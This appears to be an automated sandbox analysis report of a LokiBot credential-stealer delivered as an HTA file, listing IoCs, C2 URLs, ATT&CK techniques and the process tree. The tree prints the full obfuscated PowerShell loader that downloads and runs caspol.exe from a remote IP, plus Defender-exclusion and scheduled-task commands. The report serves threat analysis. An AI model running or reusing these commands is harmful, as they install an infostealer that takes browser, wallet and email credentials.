lokibot | b32a47004e6134879604cb3246c89b351bc5fb2547b1d87070846c5719951727

Analysis

max time kernel
129s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18-11-2024 17:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.hta
Size

178KB
MD5

51ff32b18625da8e57f2b01773842cfe
SHA1

5a67dd2a7f6e75324129678af99b09936bc5e2e9
SHA256

b32a47004e6134879604cb3246c89b351bc5fb2547b1d87070846c5719951727
SHA512

6ae49faacd42c43f288560d3cc77929e7b5465a522bdff6838df5d8f7ebc9228091e2279e9e63c008456e3c467033188a0e68234a38e8016c994b3c5eb1c8d6a
SSDEEP

96:4vCl17nf2iLZ62iLqG4SPwYNf6hzhs2iL0Y5Q:4vCldnf2iLZ62iLISWs2iL0Y5Q

Score

10^/10

lokibot collection defense_evasion discovery execution spyware stealer trojan

Malware Config

Extracted

Family

lokibot

http://94.156.177.95/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot

Blocklisted process makes network request 1 IoCs

Processes:

POwerSHELL.ExE

flow	pid	Process
13	3628	POwerSHELL.ExE

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
2160	powershell.exe
732	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

Processes:

POwerSHELL.ExEpowershell.exe

pid	Process
3628	POwerSHELL.ExE
1304	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.execaspol.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	caspol.exe

Executes dropped EXE 2 IoCs

Processes:

caspol.execaspol.exe

pid	Process
4160	caspol.exe
3252	caspol.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

caspol.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	caspol.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

caspol.exe

description	pid	Process	procid_target
PID 4160 set thread context of 3252	4160	caspol.exe	110

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

caspol.exeschtasks.exemshta.exepowershell.execvtres.exepowershell.exepowershell.exePOwerSHELL.ExEcsc.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	caspol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POwerSHELL.ExE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exe

pid	Process
4036	schtasks.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

POwerSHELL.ExEpowershell.execaspol.exepowershell.exepowershell.exe

pid	Process
3628	POwerSHELL.ExE
3628	POwerSHELL.ExE
1304	powershell.exe
1304	powershell.exe
4160	caspol.exe
2160	powershell.exe
4160	caspol.exe
732	powershell.exe
2160	powershell.exe
732	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

POwerSHELL.ExEpowershell.execaspol.exepowershell.exepowershell.execaspol.exe

description	pid	Process
Token: SeDebugPrivilege	3628	POwerSHELL.ExE
Token: SeDebugPrivilege	1304	powershell.exe
Token: SeDebugPrivilege	4160	caspol.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	732	powershell.exe
Token: SeDebugPrivilege	3252	caspol.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

mshta.exePOwerSHELL.ExEcsc.execaspol.exe

description	pid	Process	procid_target
PID 2092 wrote to memory of 3628	2092	mshta.exe	84
PID 2092 wrote to memory of 3628	2092	mshta.exe	84
PID 2092 wrote to memory of 3628	2092	mshta.exe	84
PID 3628 wrote to memory of 1304	3628	POwerSHELL.ExE	88
PID 3628 wrote to memory of 1304	3628	POwerSHELL.ExE	88
PID 3628 wrote to memory of 1304	3628	POwerSHELL.ExE	88
PID 3628 wrote to memory of 2780	3628	POwerSHELL.ExE	93
PID 3628 wrote to memory of 2780	3628	POwerSHELL.ExE	93
PID 3628 wrote to memory of 2780	3628	POwerSHELL.ExE	93
PID 2780 wrote to memory of 448	2780	csc.exe	94
PID 2780 wrote to memory of 448	2780	csc.exe	94
PID 2780 wrote to memory of 448	2780	csc.exe	94
PID 3628 wrote to memory of 4160	3628	POwerSHELL.ExE	97
PID 3628 wrote to memory of 4160	3628	POwerSHELL.ExE	97
PID 3628 wrote to memory of 4160	3628	POwerSHELL.ExE	97
PID 4160 wrote to memory of 2160	4160	caspol.exe	104
PID 4160 wrote to memory of 2160	4160	caspol.exe	104
PID 4160 wrote to memory of 2160	4160	caspol.exe	104
PID 4160 wrote to memory of 732	4160	caspol.exe	106
PID 4160 wrote to memory of 732	4160	caspol.exe	106
PID 4160 wrote to memory of 732	4160	caspol.exe	106
PID 4160 wrote to memory of 4036	4160	caspol.exe	108
PID 4160 wrote to memory of 4036	4160	caspol.exe	108
PID 4160 wrote to memory of 4036	4160	caspol.exe	108
PID 4160 wrote to memory of 3252	4160	caspol.exe	110
PID 4160 wrote to memory of 3252	4160	caspol.exe	110
PID 4160 wrote to memory of 3252	4160	caspol.exe	110
PID 4160 wrote to memory of 3252	4160	caspol.exe	110
PID 4160 wrote to memory of 3252	4160	caspol.exe	110
PID 4160 wrote to memory of 3252	4160	caspol.exe	110
PID 4160 wrote to memory of 3252	4160	caspol.exe	110
PID 4160 wrote to memory of 3252	4160	caspol.exe	110
PID 4160 wrote to memory of 3252	4160	caspol.exe	110

outlook_office_path 1 IoCs

Processes:

caspol.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	caspol.exe

outlook_win_path 1 IoCs

Processes:

caspol.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	caspol.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2092
- C:\Windows\SysWOW64\wiNDOwSpoWERsHelL\v1.0\POwerSHELL.ExE
  "C:\Windows\SysTEm32\wiNDOwSpoWERsHelL\v1.0\POwerSHELL.ExE" "PoWErShELl.EXe -Ex ByPass -noP -W 1 -c dEvicECREDenTIAlDePLOYMeNt ; iNvoke-eXPrEssion($(iNvoKe-ExprESsiOn('[syStEm.TExT.eNCOdING]'+[cHAR]58+[CHar]58+'Utf8.gEtsTrING([SySTeM.CoNVERt]'+[char]58+[Char]58+'fromBAse64StrIng('+[char]34+'JEtQeWw1UEl4REFxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlUmRlRklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVwR2NKekppUyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdtRWZCcVZKd2IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT2hlbmlXY0dJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYWNLZGFobmZjYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRXNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT1dTdUFVSGV4bSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkS1B5bDVQSXhEQXE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzM2L2Nhc3BvbC5leGUiLCIkZW5WOkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzdGFSVC1TbGVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHAr]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3628
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -noP -W 1 -c dEvicECREDenTIAlDePLOYMeNt
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1304
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pioainsv\pioainsv.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2780
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES953B.tmp" "c:\Users\Admin\AppData\Local\Temp\pioainsv\CSCCCA93449458046FB91A41D5B7BA14CC7.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:448
- - C:\Users\Admin\AppData\Roaming\caspol.exe
    "C:\Users\Admin\AppData\Roaming\caspol.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4160
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2160
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\bdWEysRwjYwmy.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:732
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bdWEysRwjYwmy" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1D18.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:4036
  - - C:\Users\Admin\AppData\Roaming\caspol.exe
      "C:\Users\Admin\AppData\Roaming\caspol.exe"
      4⤵
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:3252

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POwerSHELL.ExE.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
609B

MD5
4638accf0fe5ee6fb9a8dc65f26d51f5

SHA1
95753a5b406d5c40f3fe2bf73ec1c2c8e63fd43c

SHA256
e0c35fdec51ba0b320b993525b99455d726cf35d2b370f06da994994212a5dc7

SHA512
79fd049a717bb8b697217d0deec692504654a289cd33cf8418fde9f306a3d49085ae0a16b3a4648b72128edb539a97a6b3298b355910ce6d6bb1b323d1c8b6ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
33efa80f7a462a31b816cd9e90eed2b2

SHA1
e5d0658f1bb78032c97bc8aec243170b0a2e9ba8

SHA256
2520944452a4389e0020c4e9fd750c9a28b634815225cf5fc2ecc57d187e40ea

SHA512
eae580dfe2249e7619e99afe86fe42dd82d658fc715bfa50650e91c83fdd415ce4910f85ace84faffac4e7d24512dbbfa336c4e5dc053534933d1d30a893d838

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES953B.tmp

Filesize
1KB

MD5
62f0660cf52ed395b4a6425343382ae4

SHA1
1261c0e6aeb74b2286484185b604be403fe4f7c6

SHA256
1570347e257d7650de62eae73f427662fc3755c8449c3ef7efb31e51a6064f2f

SHA512
00a33b0456f01d40ad922be0c8afd22d698d57965fb015e4d32596b906063d3d9ca834a7019c2edc314dba7f6925d52c66d54dccdfb0ea5c0e0b46988baabeb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4g130yri.x1t.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\pioainsv\pioainsv.dll

Filesize
3KB

MD5
044e6a34491a8197e84c9f889c99701b

SHA1
eaa3d724005bf475c8d606b5180925ca547f357c

SHA256
54cc5ffd4e06dda02481b2decd77916ebbd690c6881aa799a44312e127b87fc4

SHA512
abf02f8dea56635cfc7e017ac1e760a50310ca640d2c4944e0439ab6636b79925964db18d13de05eb0183ef6e3e887b4ea7f6ecee97a5e8849742e413127723b

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp1D18.tmp

Filesize
1KB

MD5
c7ba5c1ac848550536c780356482e630

SHA1
42eb99f2ba3898360a9b6b9ecde96b2682ee0f65

SHA256
ca5a8bb1950af70a8b5f0191c5b1d515b9f7f7a5f1ac8854673534339b90a3e6

SHA512
baac35432b1d2f125357caa0037b37e60e317f6fd89d6aa2c543abe954e03d2ddadd3651d250a5e93b8bb9429f823894c216494d5503ab3ee373debbdb66e477

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2878641211-696417878-3864914810-1000\0f5007522459c86e95ffcc62f32308f1_4fc725d8-4f7d-4884-b878-08bb0ce6c800

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2878641211-696417878-3864914810-1000\0f5007522459c86e95ffcc62f32308f1_4fc725d8-4f7d-4884-b878-08bb0ce6c800

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\caspol.exe

Filesize
497KB

MD5
8c34e99269d4121a0dfe4c3eaa9e269f

SHA1
5bbaa7dc726324e057eb4f78856c368488c4805a

SHA256
2899cb71414f7d46a6be0d40a5ba017d407a41f291154ea6a86f421754d11a76

SHA512
99f3cc287b9437ee888371fac3cf37d77d39c9468086feb0c80f4a0a4cc8a750c0b2798ec32a90aea3c88ed67c36005bcfd81d8e439edcdaca9e60caa1f3f277

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pioainsv\CSCCCA93449458046FB91A41D5B7BA14CC7.TMP

Filesize
652B

MD5
8ac91e40550b9d58561c8d82ac6504d4

SHA1
ec833cc84868bed55587b91fb6106489be4c3a93

SHA256
d96dea45c953da282df5eccedb7628d1c813a729a43305d92bb65bc5c89e3ba5

SHA512
0417d04a97d985ed1b1fdd83cc54b297be79deaef697ceb134aaf6e3d218264107259007f694c028aa0acbd3419c755cd4c8666ea45d8d214571839813a1a1b9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pioainsv\pioainsv.0.cs

Filesize
487B

MD5
ee60617752b2061187e3773f962ff810

SHA1
5d3dc400820671b51499e9003fcbd7794d07e315

SHA256
69736289404f9f61bb67a99a24945aaa347591458b09f4dd686bbc58d8b25ce9

SHA512
5bf701c77b31bcf3421fa2cc4649127b54656175bdfb238ddca8606063ceec69fd76d2f611b5f55f246a3003d3fd76b1b318fa0fc4cb1b10d9b8b04e153bf231

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pioainsv\pioainsv.cmdline

Filesize
369B

MD5
0c8157ae8c8644baca532fca3cf78a23

SHA1
68bcbc107ae0af17d26e3fa1664531a29311eb30

SHA256
d9f9617f78f5add827b8c0c78aed858248002ddbf039686a74fa99f9c5e3241b

SHA512
404c7f407cb6d7f1318e74c257c99e17a649715a1a55db6887df633bc419ff964265cc73e29077b5c08198c753aa060081d0f4a04ca5652bf93326bf2d55186c

Download Submit
memory/732-133-0x000000006DBE0000-0x000000006DC2C000-memory.dmp

Filesize
304KB

Download
memory/1304-40-0x0000000006020000-0x000000000603E000-memory.dmp

Filesize
120KB

Download
memory/1304-41-0x0000000006C40000-0x0000000006CE3000-memory.dmp

Filesize
652KB

Download
memory/1304-42-0x00000000073B0000-0x0000000007A2A000-memory.dmp

Filesize
6.5MB

Download
memory/1304-43-0x0000000006D60000-0x0000000006D7A000-memory.dmp

Filesize
104KB

Download
memory/1304-44-0x0000000006DD0000-0x0000000006DDA000-memory.dmp

Filesize
40KB

Download
memory/1304-45-0x0000000006FF0000-0x0000000007086000-memory.dmp

Filesize
600KB

Download
memory/1304-46-0x0000000006F60000-0x0000000006F71000-memory.dmp

Filesize
68KB

Download
memory/1304-47-0x0000000006F90000-0x0000000006F9E000-memory.dmp

Filesize
56KB

Download
memory/1304-48-0x0000000006FA0000-0x0000000006FB4000-memory.dmp

Filesize
80KB

Download
memory/1304-49-0x00000000070B0000-0x00000000070CA000-memory.dmp

Filesize
104KB

Download
memory/1304-50-0x0000000006FE0000-0x0000000006FE8000-memory.dmp

Filesize
32KB

Download
memory/1304-29-0x0000000005FE0000-0x0000000006012000-memory.dmp

Filesize
200KB

Download
memory/1304-30-0x000000006D600000-0x000000006D64C000-memory.dmp

Filesize
304KB

Download
memory/2160-103-0x00000000057F0000-0x0000000005B44000-memory.dmp

Filesize
3.3MB

Download
memory/2160-144-0x00000000072B0000-0x00000000072C4000-memory.dmp

Filesize
80KB

Download
memory/2160-143-0x0000000007270000-0x0000000007281000-memory.dmp

Filesize
68KB

Download
memory/2160-129-0x0000000006D20000-0x0000000006DC3000-memory.dmp

Filesize
652KB

Download
memory/2160-119-0x000000006DBE0000-0x000000006DC2C000-memory.dmp

Filesize
304KB

Download
memory/2160-118-0x00000000062B0000-0x00000000062FC000-memory.dmp

Filesize
304KB

Download
memory/3252-104-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3252-106-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3628-0-0x0000000070D4E000-0x0000000070D4F000-memory.dmp

Filesize
4KB

Download
memory/3628-4-0x0000000005BF0000-0x0000000006218000-memory.dmp

Filesize
6.2MB

Download
memory/3628-1-0x0000000070D40000-0x00000000714F0000-memory.dmp

Filesize
7.7MB

Download
memory/3628-2-0x0000000002EA0000-0x0000000002ED6000-memory.dmp

Filesize
216KB

Download
memory/3628-3-0x0000000070D40000-0x00000000714F0000-memory.dmp

Filesize
7.7MB

Download
memory/3628-19-0x00000000067E0000-0x000000000682C000-memory.dmp

Filesize
304KB

Download
memory/3628-18-0x00000000067A0000-0x00000000067BE000-memory.dmp

Filesize
120KB

Download
memory/3628-81-0x0000000070D40000-0x00000000714F0000-memory.dmp

Filesize
7.7MB

Download
memory/3628-65-0x0000000006D40000-0x0000000006D48000-memory.dmp

Filesize
32KB

Download
memory/3628-5-0x00000000059E0000-0x0000000005A02000-memory.dmp

Filesize
136KB

Download
memory/3628-6-0x0000000005A80000-0x0000000005AE6000-memory.dmp

Filesize
408KB

Download
memory/3628-7-0x0000000005AF0000-0x0000000005B56000-memory.dmp

Filesize
408KB

Download
memory/3628-17-0x0000000006320000-0x0000000006674000-memory.dmp

Filesize
3.3MB

Download
memory/3628-72-0x0000000070D40000-0x00000000714F0000-memory.dmp

Filesize
7.7MB

Download
memory/3628-71-0x0000000070D4E000-0x0000000070D4F000-memory.dmp

Filesize
4KB

Download
memory/4160-88-0x00000000068F0000-0x0000000006954000-memory.dmp

Filesize
400KB

Download
memory/4160-87-0x0000000006650000-0x0000000006662000-memory.dmp

Filesize
72KB

Download
memory/4160-86-0x0000000005220000-0x00000000052BC000-memory.dmp

Filesize
624KB

Download
memory/4160-85-0x0000000004F70000-0x0000000004F7A000-memory.dmp

Filesize
40KB

Download
memory/4160-84-0x0000000004FB0000-0x0000000005042000-memory.dmp

Filesize
584KB

Download
memory/4160-83-0x00000000054C0000-0x0000000005A64000-memory.dmp

Filesize
5.6MB

Download
memory/4160-82-0x0000000000620000-0x00000000006A2000-memory.dmp

Filesize
520KB

Download